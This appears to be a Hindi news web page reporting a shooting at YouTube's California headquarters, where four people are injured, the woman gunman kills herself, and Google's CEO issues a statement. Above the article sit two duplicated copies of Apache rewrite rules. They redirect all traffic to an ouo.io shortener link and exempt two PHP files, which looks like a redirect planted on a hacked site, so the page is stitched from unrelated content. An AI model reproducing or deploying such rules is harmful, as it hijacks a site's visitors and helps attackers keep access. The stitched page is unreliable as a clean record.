
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 407
Nextवॉशिंगटन। अमेरिका में कैलिफोर्निया स्थित यू-ट्यूब मुख्यालय पर एक महिला बंदूकधारी ने गोलीबारी की है। बताया जा रहा है कि इस गोलीबारी में कम से कम चार लोग घायल हो गए। इस गोलीबारी के बाद महिला बंदूकधारी ने खुद को भी गोली मार ली।
सूत्रों से प्राप्त जानकारी के अनुसार यू-ट्यूब मुख्यालय में गोलीबारी करने वाली महिला बंदूकधारी बिल्डिंग के अंदर मृत पाई गई। बताया जा रहा है कि महिला बंदूकधारी ने फायरिंग के बाद गोली मारकर खुदकुशी कर ली। घटनास्थल पर भगदड़ सी मच गई। घबराए हुए लोगों को सुरक्षाबलों ने तुरंत इमारत से बाहर निकाला। शूटिंग की जानकारी मिलते ही घटनास्थल पर एंबुलेंस पहुंच गई थीं और पुलिस ने लोगों को इलाके से दूर रहने को कहा। इसके बाद यू-ट्यूब ऑफिस को भी बंद कर दिया गया और लोगों को बाहर निकाला गया। इस हमले में घायल हुए चार लोगों को अस्पताल में भर्ती कराया गया है, जहां उनका इलाज चल रहा है। घायलों में से एक की हालत गंभीर बताई जा रही है। अधिकारियों का कहना है कि गोलीबारी में घायल चार लोगों में से एक को महिला बंदूकधारी जानती थी। जानकारी के मुताबिक घायल युवक को संदिग्ध हमलावर महिला शूटर का प्रेमी बताया जा रहा है। गोलीबारी में घायल दो महिलाओं में से एक की हालत गंभीर बनी हुई है, जबकि दूसरे की स्थिति में सुधार हो रहा है। फिलहाल इस गोलीबारी की वजह साफ नहीं हो पाई है, लेकिन सुरक्षा एजेंसियां घरेलू विवाद मानकर इसकी जांच कर रही हैं। जांच के बाद ही गोलीबारी की वजह साफ हो पाएगी। वहीं, गूगल के CEO सुंदर पिचई ने यू-ट्यूब मुख्यालय में हुई गोलीबारी की घटना को दुखद बताया है। उन्होंने बयान जारी कर कहा, ''यू-ट्यूब मुख्यालय में गोलीबारी की दुखद घटना को शब्दों में बयां नहीं किया जा सकता है। यू-ट्यूब की सीईओ सुसान वोजिकी और मैं इस मुश्किल घड़ी में कर्मचारियों और यू-ट्यूब कम्युनिटी को सपोर्ट करने पर फोकस कर रहे हैं।''